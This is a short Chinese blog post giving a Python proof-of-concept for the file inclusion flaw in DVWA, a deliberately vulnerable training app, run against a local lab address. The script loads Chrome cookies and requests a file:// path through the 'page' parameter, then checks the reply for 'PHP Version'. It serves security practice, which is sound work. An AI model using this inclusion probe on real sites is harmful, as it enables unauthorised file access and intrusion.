POC——DVWA's File Inclusion

文件包含漏洞的验证POC比较简单，仅需get访问即可。不过有一个前提——已经把将要利用的文件传入对方服务器内，且明确利用的文件所在位置~

 1 import requests
 2 import browser_cookie3
 3 
 4 cookie = browser_cookie3.chrome()
 5 url = r"http://192.168.117.130/DVWA-1.9/vulnerabilities/fi/?page=file:///C:\Users\wavesky\Desktop/1.txt"
 6 response = requests.get(url=url,cookies=cookie)
 7 
 8 re = 'PHP Version'
 9 flag=re in str(response.content)
10 
11 if flag:
12     print("It looks likely vulnerable")
13 else:
14     print("It is strong")

三个Level均可，直接下一个~

posted @ 2022-06-19 16:45 wavesky 阅读(31) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

wavesky

POC——DVWA's File Inclusion

公告